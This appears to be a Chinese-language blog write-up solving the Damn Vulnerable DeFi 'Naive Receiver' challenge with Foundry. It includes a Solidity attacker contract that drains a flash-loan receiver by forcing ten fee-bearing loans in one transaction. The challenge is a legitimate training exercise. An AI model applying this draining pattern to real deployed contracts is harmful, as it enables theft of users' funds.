Challenge2-NaivereceiverNaivereceiver为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉
为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉
攻击目标是使得receiver中的余额为空,因为每次通过pool执行闪电贷都需要1eth的手续费,因此只需通过receiver向pool执行十次闪电贷即可把10eth全部通过手续费的方式转给pool
根据题目要求,尽量在一笔交易完成,因此可以编写合约在一笔交易中完成十次闪电贷
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "../../src/naive-receiver/FlashLoanReceiver.sol";
import "../../src/naive-receiver/NaiveReceiverLenderPool.sol";
import "openzeppelin-contracts/contracts/interfaces/IERC3156FlashBorrower.sol";
contract Attacker {
constructor(address payable _pool, address payable _receiver){
NaiveReceiverLenderPool pool = NaiveReceiverLenderPool(_pool);
for(uint256 i=0; i<10; i++){
pool.flashLoan(IERC3156FlashBorrower(_receiver), address(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE), 1, "0x");
}
}
}
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!